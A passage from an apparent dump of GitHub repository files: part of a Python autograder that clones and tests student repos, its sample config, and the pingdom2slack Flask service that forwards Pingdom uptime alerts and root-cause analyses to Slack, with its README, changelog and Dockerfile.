d['org'] # required\n self.project = d['project'] # required\n self.project_cfg = None # comes from project toml\n self.ioprint = d['ioprint'] # optional\n self.testspath = os.path.expanduser(d.get('testspath')) # required\n self.project_tests = os.path.join(self.testspath, self.project) \n self.students = d.get('students') # could get students or local\n self.test_name = d['name'] # optional\n self.verbose = d['verbose'] # optional, defaults to False\n self.verbose2 = d['verbose2'] # optional\n if self.verbose2:\n self.verbose = True\n\n def validate_args(d):\n if d['project'] is None:\n fatal('project not given in config or command line')\n if d['action'] == 'exec' and d.get('exec') is None:\n fatal('-e \\'cmd\\' not given with exec')\n\n\n def parse_args(fname):\n # Check to see if ~/.config/grade/config.toml exits\n # Create if it does not exit\n # Create path if needed\n home = str(pathlib.Path.home())\n config_path = home + '/.config/grade'\n config_file_path = pathlib.Path(config_path + '/config.toml')\n if not config_file_path.exists():\n pathlib.Path(config_path).mkdir(parents=True, exist_ok=True)\n with open(config_file_path, 'w') as f:\n f.write('# Default config.toml\\n')\n f.write('# credentials = \"ssh\"\\n')\n f.write('# credentials = \"http\"\\n') \n f.write('# digital = \"path_to_Digital.jar\"\\n')\n f.write('# org = \"github_org_name\"\\n')\n f.write('# project = \"default_project_name\"\\n')\n f.write('# students = [\\n')\n f.write('# \"github_id_1\",\\n')\n f.write('# \"github_id_2\",\\n')\n f.write('# \"github_id_3\"\\n')\n f.write('# ]\\n')\n f.write('# testspath = \"path_to_tests\"\\n')\n f.write('# verbose = false\\n')\n f.write('# verbose = true\\n')\n\n # .toml file contains defaults. 
Command line args can override\n defaults = load_toml(config_file_path)\n p = argparse.ArgumentParser()\n p.add_argument('action', type=str, choices=['class', 'clone', 'exec', 'test'])\n p.add_argument('-c', '--credentials', choices=['https', 'ssh'], help='Github auth method',\n default=defaults.get('credentials', 'ssh'))\n p.add_argument('-d', '--digital', help='Path to digital.jar',\n default=defaults.get('digital', None))\n p.add_argument('-e', '--exec', help='Execute command in each repo (git pull or make clean)',\n default=defaults.get('exec', None))\n p.add_argument('-l', '--local', help='Local directory to test',\n default=defaults.get('local', '.'))\n p.add_argument('-n', '--name', help='Run test case with this name',\n default=defaults.get('test_name', None))\n p.add_argument('-o', '--org', help='Github Classroom Organization',\n default=defaults.get('org', None))\n p.add_argument('-p', '--project', help='Project name',\n default=defaults.get('project', None))\n p.add_argument('-i', '--ioprint', action='store_true', help='Print input and output',\n default=defaults.get('print', False))\n p.add_argument('-s', '--students', nargs='+', type=str, help='Student Github IDs',\n default=defaults.get('students', None))\n p.add_argument('-t', '--testspath', help='Path to tests',\n default=defaults.get('testspath', '~/tests'))\n p.add_argument('-v', '--verbose', action='store_true', help='Print actual and expected output when they don\\'t match',\n default=defaults.get('verbose', False))\n p.add_argument('-vv', '--verbose2', action='store_true', help='Print actual and expected output whether they match or not',\n default=defaults.get('verbose2', False))\n \n d = vars(p.parse_args())\n Config.validate_args(d)\n return d\n\n\nclass TestCase:\n trans_table = str.maketrans(dict.fromkeys(string.whitespace))\n def __init__(self, cfg, d):\n self.validate(d)\n self.cmd_line = []\n for i in d['input']:\n if '$project_tests' in i:\n param = i.replace('$project_tests', cfg.project_tests)\n elif '$project' in i:\n param = i.replace('$project', cfg.project)\n elif '$digital' in i:\n param = i.replace('$digital', cfg.digital)\n else:\n param = i\n self.cmd_line.append(param)\n self.expected = d.get('expected', None)\n self.name = d.get('name', None)\n self.output = d.get('output', 'stdout')\n self.rubric = d.get('rubric', None)\n self.strip_output = cfg.project_cfg.strip_output\n self.verbose = cfg.verbose\n self.verbose2 = cfg.verbose2\n self.ioprint = cfg.ioprint\n\n\n def validate(self, d):\n test_name = d.get('name', 'unknown')\n if type(d.get('rubric')) is not int:\n fatal('Rubric for test \\\"{test_name}\\\" must be an integer')\n if type(d.get('input')) is not list:\n fatal(f'Input for test \\\"{test_name}\\\" must be a list')\n if type(d.get('expected')) is not str:\n fatal(f'Expected output for test \\\"{test_name}\\\" must be a string')\n\n\n def get_actual(self, local):\n if self.output == 'stdout':\n # get actual output from stdout\n act = cmd_exec_capture(self.cmd_line, local)\n else:\n # ignore stdout and get actual output from the specified file\n path = os.path.join(local, self.output)\n act = cmd_exec_capture(self.cmd_line, local, path)\n if self.strip_output:\n act = act.replace(self.strip_output, '')\n return act\n\n def prepare_cmd_line(self, cmd_line):\n cmd_line_prepared = [cmd_line[0]]\n for arg in cmd_line[1:]:\n if ' ' in arg:\n arg = '\"' + arg + '\"'\n cmd_line_prepared.append(arg)\n return cmd_line_prepared\n\n def make_lines(self, text):\n text_lines = []\n for line in 
text.split('\\n'):\n text_lines.append(line + '\\n')\n return text_lines\n \n def match_expected(self, actual):\n # Strip trailing whitespace - expected has extra newline\n exp = self.expected.rstrip()\n act = actual.rstrip()\n\n cmd_line = self.prepare_cmd_line(self.cmd_line)\n cmd_line_str = ' '.join(cmd_line)\n\n if self.verbose2:\n print(f\"===[{self.name}]===expected\\n$ {cmd_line_str}\\n{exp}\")\n print()\n print(f\"===[{self.name}]===actual\\n$ {cmd_line_str}\\n{act}\")\n print()\n if self.verbose and (act != exp):\n print(f\"===[{self.name}]===diff\\n$ {cmd_line_str}\")\n exp_lines = self.make_lines(exp)\n act_lines = self.make_lines(act)\n diff = difflib.context_diff(exp_lines, act_lines, fromfile='expected', tofile='actual')\n for line in diff:\n print(line, end='')\n print()\n \n if self.ioprint:\n print(f\"$ {cmd_line_str}\\n{actual}\")\n return act == exp\n\ndef load_tests(cfg):\n tests_file = os.path.join(cfg.project_tests, cfg.project + '.toml', )\n toml_input = load_toml(tests_file)\n cfg.project_cfg = ProjectConfig(toml_input.get('project', {}))\n test_cases = []\n for t in toml_input['tests']:\n test_cases.append(TestCase(cfg, t))\n\n return test_cases\n\n\nclass Repo:\n def __init__(self, cfg, **kwargs):\n # calculate the local and remote for this repo\n student = kwargs.get('student')\n if student:\n pg = cfg.project + '-' + student\n self.local = os.path.join('github.com', cfg.org, pg)\n # set up remote repo for clone\n if cfg.credentials == 'https':\n self.remote = 'https://github.com/'\n elif cfg.credentials == 'ssh':\n self.remote = '[email protected]:/'\n self.remote += cfg.org + '/' + pg + '.git'\n # allow -l/--local to override the local directory calculated above\n if kwargs.get('local'):\n self.local = kwargs['local'].rstrip('/')\n self.label = self.local.split('/')[-1]\n self.results = []\n self.verbose = cfg.verbose\n self.build_plan = cfg.project_cfg.build\n\n def build(self):\n if self.build_plan == 'none':\n return 0\n elif self.build_plan == 'make':\n return cmd_exec_rc(['make', '-C', self.local])\n else:\n fatal(f'Unknown build plan: \\\"{self.build_plan}\\\"')\n\n\n def clone(self):\n if self.remote is None:\n raise Exception(self.label + ' no remote to clone')\n if os.path.isdir(self.local):\n print('Already exists: ' + self.local)\n return 0\n print(self.local)\n return cmd_exec_rc(['git', 'clone', self.remote, self.local])\n\n\n def exec_cmd(self, cmd):\n print(self.local, end = ': ')\n output = cmd_exec_capture(cmd, wd=self.local, shell=True)\n print(output)\n\n\n def test_one(self, test_case):\n score = 0\n actual = test_case.get_actual(self.local)\n if test_case.match_expected(actual):\n score = test_case.rubric\n\n # record score for later printing\n result = {'test': test_case, 'score': score}\n self.results.append(result)\n\n\n def test(self, test_cases, test_name):\n if test_name is not None:\n for tc in test_cases:\n if tc.name == test_name:\n self.test_one(tc)\n else:\n for tc in test_cases:\n self.test_one(tc)\n\n\n def print_results(self, longest):\n print(self.label, end='')\n for n in range(longest - len(self.label)):\n print(' ', end='')\n\n earned = 0\n avail = 0\n for r in self.results:\n rubric = r['test'].rubric\n avail += rubric\n if r['score'] == 0:\n print_red(r['test'].name)\n else:\n earned += rubric\n print_green(r['test'].name)\n\n print(f\"{earned}/{avail}\")\n\n\ndef main():\n args = Config.parse_args('config.toml')\n cfg = Config(args)\n test_cases = load_tests(cfg)\n\n # Build list of repos to run, either from local or 
list of students\n repos = []\n if cfg.action == 'test':\n # One local repo\n if not os.path.isdir(cfg.local):\n raise Exception(cfg.local + ' is not a directory')\n repo = Repo(cfg, local=cfg.local)\n repos.append(repo)\n elif cfg.students:\n # Make repo list from student list\n for s in cfg.students:\n repo = Repo(cfg, student=s)\n repos.append(repo)\n else:\n print(\"Must either 'test' one repo, or give a list of students to 'clone', 'pull' or 'class'\")\n return -1\n\n # Calc column width for justified printing\n longest = 0;\n for r in repos:\n l = len(r.label)\n if l > longest:\n longest = l\n longest += 1\n\n # Run the specified actions for all of the repos\n for repo in repos:\n try:\n if cfg.action == 'clone':\n repo.clone()\n elif cfg.action == 'exec':\n repo.exec_cmd(cfg.exec_cmd)\n elif cfg.action == 'class' or cfg.action == 'test':\n repo.build()\n repo.test(test_cases, cfg.test_name)\n repo.print_results(longest)\n except Exception as e:\n print_red(repo.label + ' ' + str(e), '\\n')\n continue\n\n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.6700000166893005,
"alphanum_fraction": 0.699999988079071,
"avg_line_length": 26.272727966308594,
"blob_id": "a7bdc80f00ecc573df2478064afb1a24ccb372cf",
"content_id": "181f7eb32e88210f05d572caf89cee36fefa95ef",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "TOML",
"length_bytes": 300,
"license_type": "permissive",
"max_line_length": 64,
"num_lines": 11,
"path": "/config.toml",
"repo_name": "maguiremarion/autograder",
"src_encoding": "UTF-8",
"text": "# This is an example config file showing how to set it up\n# Your real config file should go in ~/.config/grade/config.toml\n\ncredentials = \"ssh\"\ndigital = \"/mnt/c/Users/usf/Documents/Digital/digital.jar\"\norg = \"cs-315-03-20f\"\nproject = \"project02\"\nstudents = [\n \"phpeterson-usf\",\n \"gdbenson\",\n]\n"
}
] | 4 |
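For context, the `grade` script in the record above loads its test cases from `<testspath>/<project>/<project>.toml` via `load_tests()`, and `TestCase.validate()` requires each test to carry a `name`, an `input` list, an `expected` string, and an integer `rubric`. The sketch below parses a hypothetical tests file of that shape; the test names, commands, and point values are invented for illustration and are not taken from the repo:

```python
# Minimal sketch of a tests file accepted by the grade script's load_tests().
# Requires the same third-party package the script imports: pip install toml
import toml

TESTS_TOML = """
[project]
build = "make"             # grade runs 'make -C <repo>'; use "none" to skip

[[tests]]
name = "hello"             # selectable with: grade test -n hello
input = ["./hello"]        # argv list; $project/$project_tests/$digital expand
expected = "hello, world"  # compared against stdout after rstrip()
rubric = 5                 # integer points awarded on a match

[[tests]]
name = "file-output"
input = ["./hello", "-o", "out.txt"]
output = "out.txt"         # read actual output from this file, not stdout
expected = "42"
rubric = 10
"""

parsed = toml.loads(TESTS_TOML)
for test in parsed["tests"]:
    print(test["name"], test["rubric"])
```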
rnt/pingdom2slack | https://github.com/rnt/pingdom2slack | 75f9fa5ed6fb6fe9441ab8c3a7429b18f2fc26e5 | 92ed0b3a6c2b6cb039ee6eee8a0b243f5ecdf82e | 4b7c97047aded886b2d8d529046b61634a473bc3 | refs/heads/master | 2020-08-28T18:08:09.777879 | 2019-11-08T01:45:35 | 2019-11-08T01:45:35 | 217778298 | 1 | 0 | null | 2019-10-26T22:46:47 | 2017-07-12T15:23:47 | 2017-07-12T15:23:46 | null |
[
{
"alpha_fraction": 0.6222222447395325,
"alphanum_fraction": 0.6984127163887024,
"avg_line_length": 30.5,
"blob_id": "9cefba7fe2cfcf86a808bb313339fae2da28f199",
"content_id": "249f6e9b7a82473252f654419c7f66c0eed1e52e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 315,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 10,
"path": "/CHANGELOG.md",
"repo_name": "rnt/pingdom2slack",
"src_encoding": "UTF-8",
"text": "# Changelog\n\nThe format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/),\nand this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).\n\n## [0.1.0] - 2019-10-30\n### Added\n- Add support to *http check*.\n\n[0.1.0]: https://github.com/rnt/pingdom2slack/releases/tag/v0.1.0\n"
},
{
"alpha_fraction": 0.48124006390571594,
"alphanum_fraction": 0.48586371541023254,
"avg_line_length": 29.052391052246094,
"blob_id": "0c0c0ecb02bc2c7fb10bcaf2188f542c3b64f8f4",
"content_id": "a81ebc9d7adb14f63447b7e0dc9e2d598ded4228",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 13193,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 439,
"path": "/pingdom2slack.py",
"repo_name": "rnt/pingdom2slack",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport datetime\nimport json\nimport os\nimport time\n\nfrom flask import abort, Flask, jsonify, request\nimport requests\n\n__version__ = \"0.1.3\"\n\napp = Flask(__name__)\n\ntry:\n SLACK_WEBHOOK = os.environ[\"SLACK_WEBHOOK\"]\n app.logger.debug(\"Slack webhook URL found in env variable\")\nexcept:\n SLACK_WEBHOOK = None\n app.logger.error(\"No Slack webhook URL found\")\n abort(502)\n\ntry:\n PINGDOM_TOKEN = os.environ[\"PINGDOM_TOKEN\"]\n app.logger.debug(\"Pingdom Token found in env variable\")\nexcept:\n PINGDOM_TOKEN = None\n app.logger.error(\"No Pingdom Token found\")\n abort(502)\n\n\nEMOJI_NUMBER = [\n \":one:\",\n \":two:\",\n \":three:\",\n \":four:\",\n \":five:\",\n \":six:\",\n \":seven:\",\n \":eight:\",\n \":nine:\",\n \":keycap_ten:\",\n]\n\n\ndef pingdom_analysis(check_id, state_changed_timestamp):\n \"\"\"Return pingdom analysis for a check.\n\n :param int check_id: Pingdom check id to search\n :param int state_changed_timestamp: RCA timestamp\n\n :return dict\n \"\"\"\n headers = {\"Authorization\": \"Bearer %s\" % PINGDOM_TOKEN}\n\n url = \"https://api.pingdom.com/api/3.1/analysis/%d\" % check_id\n\n # Make the call\n response = requests.get(url, headers=headers)\n app.logger.debug(response.__dict__)\n if response.status_code != 200:\n app.logger.debug(response.content)\n return None\n\n analysis = response.json()[\"analysis\"]\n analysis_ids = [\n test[\"id\"]\n for test in analysis\n if test[\"timefirsttest\"] == state_changed_timestamp\n ]\n if len(analysis_ids) == 0:\n app.logger.debug(\"No analysis id\")\n return None\n else:\n app.logger.debug(\"pingdom analysis id = %d\" % analysis_ids[0])\n\n url = \"https://api.pingdom.com/api/3.1/analysis/%d/%d\" % (check_id, analysis_ids[0])\n\n response = requests.get(url, headers=headers)\n\n if response.status_code != 200:\n app.logger.debug(response.content)\n return None\n else:\n return response.json()\n\n\ndef post_2_slack(channel, pingdom_data):\n \"\"\"Post message to slack.\n\n :param str channel: Slack channel\n :param dict pingdom_data: Data received from webhook\n \"\"\"\n\n start_time = time.time()\n\n status = pingdom_data[\"current_state\"]\n\n icon_emoji = {\"DOWN\": \":warning:\", \"UP\": \":ok:\"}.get(status, \":ghost:\")\n\n title_emoji = {\n \"DOWN\": os.environ.get(\"TITLE_EMOJI_DOWN\", \":warning:\"),\n \"UP\": os.environ.get(\"TITLE_EMOJI_UP\", \":ok:\"),\n }.get(status, \":ghost:\")\n\n analysis = None\n if status == \"DOWN\":\n analysis = pingdom_analysis(\n pingdom_data[\"check_id\"], pingdom_data[\"state_changed_timestamp\"]\n )\n\n analysis_time = time.time()\n\n check_name = pingdom_data[\"check_name\"]\n\n if \"full_url\" in pingdom_data[\"check_params\"].keys():\n check_url = pingdom_data[\"check_params\"][\"full_url\"]\n else:\n check_url = pingdom_data[\"check_params\"][\"hostname\"]\n\n error = pingdom_data[\"long_description\"]\n\n # Choose attachment colot\n color = {\"DOWN\": \"danger\", \"UP\": \"good\"}.get(status, \"#0000FF\")\n\n verify_certificate = {True: \":+1:\", False: \":-1:\"}.get(\n pingdom_data[\"check_params\"][\"verify_certificate\"], \":thinking_face:\"\n )\n basic_auth = {True: \":+1:\", False: \":-1:\"}.get(\n pingdom_data[\"check_params\"][\"basic_auth\"], \":thinking_face:\"\n )\n\n fields = []\n\n blocks = [\n {\n \"text\": {\n \"text\": \"%s *%s* is *%s* %s\"\n % (title_emoji, check_name, status, title_emoji),\n \"type\": \"mrkdwn\",\n },\n \"type\": \"section\",\n },\n {\n \"text\": {\"text\": \"*Check URL*:\\n%s\" % 
(check_url), \"type\": \"mrkdwn\"},\n \"type\": \"section\",\n },\n ]\n\n BLOCK_ID_WEBHOOK_DATA = len(blocks)\n blocks.append(\n {\n \"fields\": [\n {\n \"text\": \"*Check Type:*\\n%s\" % pingdom_data[\"check_type\"],\n \"type\": \"mrkdwn\",\n },\n {\n \"text\": \"*Importance Level:*\\n%s\"\n % pingdom_data[\"importance_level\"],\n \"type\": \"mrkdwn\",\n },\n {\"text\": \"*Basic auth?:*\\n%s\" % basic_auth, \"type\": \"mrkdwn\"},\n {\n \"text\": \"*Verify Certificate:*\\n%s\" % verify_certificate,\n \"type\": \"mrkdwn\",\n },\n {\n \"text\": \"*Response Time Threshold:*\\n%s ms\"\n % pingdom_data[\"check_params\"][\"responsetime_threshold\"],\n \"type\": \"mrkdwn\",\n },\n ],\n \"type\": \"section\",\n }\n )\n\n if len(pingdom_data[\"tags\"]) > 0:\n blocks[BLOCK_ID_WEBHOOK_DATA][\"fields\"].append(\n {\n \"text\": \"*Tags:*\\n%s\"\n % \", \".join([\"`%s`\" % tag for tag in pingdom_data[\"tags\"]]),\n \"type\": \"mrkdwn\",\n }\n )\n\n if len(pingdom_data.get(\"check_params\", {}).get(\"shouldcontain\", \"\")) > 0:\n blocks[BLOCK_ID_WEBHOOK_DATA][\"fields\"].append(\n {\n \"text\": \"*Should Contain:*\\n`%s`\"\n % pingdom_data[\"check_params\"][\"shouldcontain\"],\n \"type\": \"mrkdwn\",\n }\n )\n\n if len(pingdom_data.get(\"check_params\", {}).get(\"shouldnotcontain\", \"\")) > 0:\n blocks[BLOCK_ID_WEBHOOK_DATA][\"fields\"].append(\n {\n \"text\": \"*Should Not Contain:*\\n`%s`\"\n % pingdom_data[\"check_params\"][\"shouldnotcontain\"],\n \"type\": \"mrkdwn\",\n }\n )\n\n if len(pingdom_data.get(\"first_probe\", {}).get(\"location\", \"\")) > 0:\n blocks[BLOCK_ID_WEBHOOK_DATA][\"fields\"].append(\n {\n \"text\": \"*First Probe:*\\n%s\" % pingdom_data[\"first_probe\"][\"location\"],\n \"type\": \"mrkdwn\",\n }\n )\n\n if len(pingdom_data.get(\"second_probe\", {}).get(\"location\", \"\")) > 0:\n blocks[BLOCK_ID_WEBHOOK_DATA][\"fields\"].append(\n {\n \"text\": \"*Second Probe:*\\n%s\"\n % pingdom_data[\"second_probe\"][\"location\"],\n \"type\": \"mrkdwn\",\n }\n )\n\n if len(pingdom_data[\"custom_message\"]) > 0:\n blocks.append(\n {\n \"text\": {\n \"text\": \"*Custom Message*: %s\" % pingdom_data[\"custom_message\"],\n \"type\": \"mrkdwn\",\n },\n \"type\": \"section\",\n }\n )\n\n if status == \"DOWN\":\n blocks.append({\"type\": \"divider\"})\n blocks.append(\n {\n \"text\": {\n \"text\": \"Downtime and *Root Cause Analysis* \"\n \"(<https://www.pingdom.com/tutorial/downtime-root-cause/|read more>)\",\n \"type\": \"mrkdwn\",\n },\n \"type\": \"section\",\n }\n )\n\n analysis_counter = 0\n\n if analysis is None and status == \"DOWN\":\n blocks.append(\n {\n \"text\": {\n \"text\": \":warning: Could no fetch analysis :warning: \",\n \"type\": \"mrkdwn\",\n },\n \"type\": \"section\",\n }\n )\n elif analysis is not None:\n for task in analysis[\"analysisresult\"][\"tasks\"]:\n\n blocks.append(\n {\n \"text\": {\n \"text\": \"%s analysis\" % EMOJI_NUMBER[analysis_counter],\n \"type\": \"mrkdwn\",\n },\n \"type\": \"section\",\n }\n )\n fields = []\n raw_response = None\n\n for result in task[\"result\"]:\n\n value = result[\"value\"]\n\n if result[\"name\"] == \"timestamp\":\n value = datetime.datetime.fromtimestamp(\n int(result[\"value\"])\n ).strftime(\"%Y-%m-%d %H:%M:%S\")\n elif result[\"name\"] == \"raw_response\":\n # value = \"```%s```\" % \"\\n\".join(result[\"value\"])\n raw_response = \"\\n\".join(result[\"value\"])\n continue\n elif result[\"name\"] == \"communication_log\":\n continue\n # if len(result[\"value\"][0][\"response_content\"]) > 0:\n # value = 
\"```%s```\\n\\n```%s```\" % (\n # result[\"value\"][0][\"request\"],\n # result[\"value\"][0][\"response_content\"],\n # )\n # else:\n # value = \"```%s```\" % (result[\"value\"][0][\"request\"])\n\n fields.append(\n {\"text\": \"*%s:*\\n%s\" % (result[\"name\"], value), \"type\": \"mrkdwn\"}\n )\n\n blocks.append({\"fields\": fields, \"type\": \"section\"})\n if raw_response is not None:\n blocks.append(\n {\n \"text\": {\n \"text\": \"*Raw Response:*\\n```%s```\" % raw_response,\n \"type\": \"mrkdwn\",\n },\n \"type\": \"section\",\n }\n )\n blocks.append({\"type\": \"divider\"})\n analysis_counter += 1\n\n # Let's build our payload\n payload = {\n \"channel\": channel,\n \"blocks\": blocks,\n \"attachments\": [],\n \"icon_emoji\": icon_emoji,\n \"username\": \"Pingdom\",\n }\n\n # Add specific headers\n headers = {\"Content-Type\": \"application/json\"}\n\n start_slack_notify = time.time()\n\n # Make the call\n response = requests.post(SLACK_WEBHOOK, headers=headers, data=json.dumps(payload))\n\n end_slack_notify = time.time()\n\n app.logger.debug(response.__dict__)\n if response.status_code == 200:\n return (\n jsonify(\n {\n \"analysis_time\": analysis_time - start_time,\n \"process_time\": start_slack_notify - analysis_time,\n \"notify_time\": end_slack_notify - start_slack_notify,\n \"total_time\": time.time() - start_time,\n }\n ),\n 200,\n )\n else:\n app.logger.debug(response.content)\n return (\n jsonify(\n {\n \"analysis_time\": analysis_time - start_time,\n \"process_time\": start_slack_notify - analysis_time,\n \"notify_time\": end_slack_notify - start_slack_notify,\n \"total_time\": time.time() - start_time,\n \"content\": response.content,\n }\n ),\n response.status_code,\n )\n\n\[email protected](\"/monitoring/health\", methods=[\"GET\"])\ndef health():\n status = 200\n if SLACK_WEBHOOK is None or PINGDOM_TOKEN is None:\n status = 500\n\n return (\n jsonify(\n {\n \"SLACK_WEBHOOK\": SLACK_WEBHOOK is not None,\n \"PINGDOM_TOKEN\": PINGDOM_TOKEN is not None,\n \"version\": __version__,\n }\n ),\n status,\n )\n\n\[email protected](\"/<channel>\", methods=[\"POST\"])\ndef slack_poster(channel):\n # Initialize the fields of our message\n check_name = None\n check_url = None\n status = None\n error = None\n\n app.logger.info(\"Post message to %s channel\", channel)\n\n # Define a default channell\n if not channel:\n return jsonify({\"error\": \"channel is missing\"}), 400\n\n try:\n pingdom_data = request.get_json()\n except Exception as e:\n app.logger.error(\"Impossible to extract data from this pingdom call\")\n app.logger.error(e)\n\n try:\n check_name = pingdom_data[\"check_name\"]\n except Exception as e:\n app.logger.error(\"Impossible to extract check_name from this pingdom call\")\n app.logger.error(e)\n app.logger.debug(pingdom_data)\n\n try:\n if \"full_url\" in pingdom_data[\"check_params\"].keys():\n check_url = pingdom_data[\"check_params\"][\"full_url\"]\n else:\n check_url = pingdom_data[\"check_params\"][\"hostname\"]\n except Exception as e:\n app.logger.error(\"Impossible to extract the full_url from this pingdom call\")\n app.logger.error(e)\n app.logger.debug(pingdom_data)\n\n try:\n status = pingdom_data[\"current_state\"]\n except Exception as e:\n app.logger.error(\"Impossible to extract status from this pingdom call\")\n app.logger.error(e)\n app.logger.debug(pingdom_data)\n\n try:\n error = pingdom_data[\"long_description\"]\n except Exception as e:\n app.logger.error(\"Impossible to extract error message from this pingdom call\")\n 
app.logger.error(e)\n app.logger.debug(pingdom_data)\n\n app.logger.debug(\n \"Posting to %s: %s is %s\"\n % (channel, pingdom_data[\"check_name\"], pingdom_data[\"current_state\"])\n )\n return post_2_slack(\"#%s\" % channel, pingdom_data)\n\n\[email protected](\"/<channel>\", methods=[\"GET\"])\ndef slack_poster_get(channel):\n return \"pingdom2slack : pingdom alerts to slack webhkook !\"\n"
},
{
"alpha_fraction": 0.5744573473930359,
"alphanum_fraction": 0.5961635708808899,
"avg_line_length": 25.0657901763916,
"blob_id": "f4e8639f3ff4fecdaaa42885bf2a4ae74b28a68a",
"content_id": "507e3329d67629be912d342ddee4ee00f2d71a74",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1981,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 76,
"path": "/README.md",
"repo_name": "rnt/pingdom2slack",
"src_encoding": "UTF-8",
"text": "# pingdom2slack\n\nSmall app to hook pingdom app monitoring to slack.\nThe goal is to add the error message when one of your site is down.\n\n## Usage\n\nThe environment variables used are:\n\n| Environment variable | Description | Type | Default |\n|:--------------------:|:-----------------------------------------------------------:|:--------:|:-----------:|\n| `SLACK_WEBHOOK` | Slack webhook. | Required | |\n| `PINGDOM_TOKEN` | Pingdom token for v3.1 API | Required | |\n| `TITLE_EMOJI_DOWN` | Emoji to use in the title, when the notification is by DOWN | Optional | `:warning:` |\n| `TITLE_EMOJI_UP` | Emoji to use in the title, when the notification is by UP | Optional | `:ok:` |\n\n\n### With Docker\n\n```\nsudo docker run -d -e SLACK_WEBHOOK=https://***** -e PINGDOM_TOKEN=***** -p 5000:5000 rcovarru/pingdom2slack\n```\n\n### Standalone app\n\n```\nvirtualenv -p python3.8 venv\nsource venv/bin/activate\npip install -r requirements.txt\nexport SLACK_WEBHOOK=https://*****\nexport PINGDOM_TOKEN=*****\n```\n\n#### Development server\n\n```\nexport FLASK_APP=pingdom2slack.py\nflask run --host=0.0.0.0\n```\n\n#### Production server\n\n```\ngunicorn --bind=0.0.0.0:5000 pingdom2slack:app\n```\n\n## Debug\n\nYou can run the app with a specific env variables `FLASK_DEBUG=1` to enable debug logging.\n\n\n## Compile requirements\n\n```\npip install pip-tools\npip-compile --output-file requirements.txt requirements.in\n```\n\n## Build & Run\n\n```\ndocker build -t pingdom2slack:local .\n\ndocker run -e SLACK_WEBHOOK=https://***** -e PINGDOM_TOKEN=***** -p 5000:5000 pingdom2slack:local\n```\n\n\n## Basic testing\n\n[Pingdom webhooks](https://www.pingdom.com/resources/webhooks/) are available in official documentation.\n\nAnd local testing example is:\n\n```\ncurl -v -H \"Content-Type: application/json\" -d @payload/http.json localhost:5000/test_channel\n```\n"
},
{
"alpha_fraction": 0.6262626051902771,
"alphanum_fraction": 0.7272727489471436,
"avg_line_length": 17,
"blob_id": "cb01c9e5dd5ca9503c634cab415732002d6bf68c",
"content_id": "0afecff9f4bc8b722da250c6ed9dc3841b70407a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 198,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 11,
"path": "/Dockerfile",
"repo_name": "rnt/pingdom2slack",
"src_encoding": "UTF-8",
"text": "FROM python:3.8.0-alpine3.10\n\nWORKDIR /app\n\nCOPY requirements.txt pingdom2slack.py ./\n\nRUN pip install -r requirements.txt\n\nEXPOSE 5000\n\nCMD [\"gunicorn\", \"--bind=0.0.0.0:5000\", \"pingdom2slack:app\"]\n"
}
] | 4 |
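The `pingdom2slack.py` handler in the record above indexes straight into the webhook body (`check_name`, `current_state`, `check_params`, probe locations, and so on), and its README tests the service by POSTing a saved payload to `localhost:5000/test_channel`. The snippet below is a hypothetical local smoke test in the same spirit; every field value is invented and only needs to satisfy the lookups in `slack_poster()` and `post_2_slack()`:

```python
# Hypothetical smoke test for a locally running pingdom2slack instance.
# Mirrors the README's curl example; requires: pip install requests
import requests

payload = {
    "check_id": 12345,                      # used to look up the RCA analysis
    "check_name": "example-site",
    "check_type": "HTTP",
    "current_state": "DOWN",                # "DOWN" triggers the analysis path
    "state_changed_timestamp": 1572392100,
    "importance_level": "HIGH",
    "long_description": "HTTP Error 500",
    "custom_message": "",
    "tags": ["production"],
    "check_params": {
        "full_url": "https://example.com/health",
        "hostname": "example.com",
        "basic_auth": False,
        "verify_certificate": True,
        "responsetime_threshold": 30000,
        "shouldcontain": "",
        "shouldnotcontain": "",
    },
    "first_probe": {"location": "Amsterdam, Netherlands"},
    "second_probe": {"location": "Montreal, Canada"},
}

# Posts to the <channel> route; the app forwards the message to "#test_channel".
resp = requests.post("http://localhost:5000/test_channel", json=payload)
print(resp.status_code, resp.text)
```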
asic1123/GPS_UpperComputer_MQTT | https://github.com/asic1123/GPS_UpperComputer_MQTT | bdc69f9e95baa3f8a68d3baf4b486fc0be23bef2 | 1032002986f21dde5e9c9e09e5bd7fbb6236e99e | 0573702ef1730bfe11beec84ae0ab80287bc59e8 | refs/heads/master | 2020-08-08T09:30:10.957998 | 2019-07-31T06:45:57 | 2019-07-31T06:45:57 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5322746634483337,
"alphanum_fraction": 0.5498456358909607,
"avg_line_length": 38.834835052490234,
"blob_id": "f9485afed8fe3649ac5bd59e6596553bf01a5c23",
"content_id": "b3701628ad09fccd695dcd7097c208e56ba8978a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 14174,
"license_type": "no_license",
"max_line_length": 311,
"num_lines": 333,
"path": "/Py/mqtt.py",
"repo_name": "asic1123/GPS_UpperComputer_MQTT",
"src_encoding": "UTF-8",
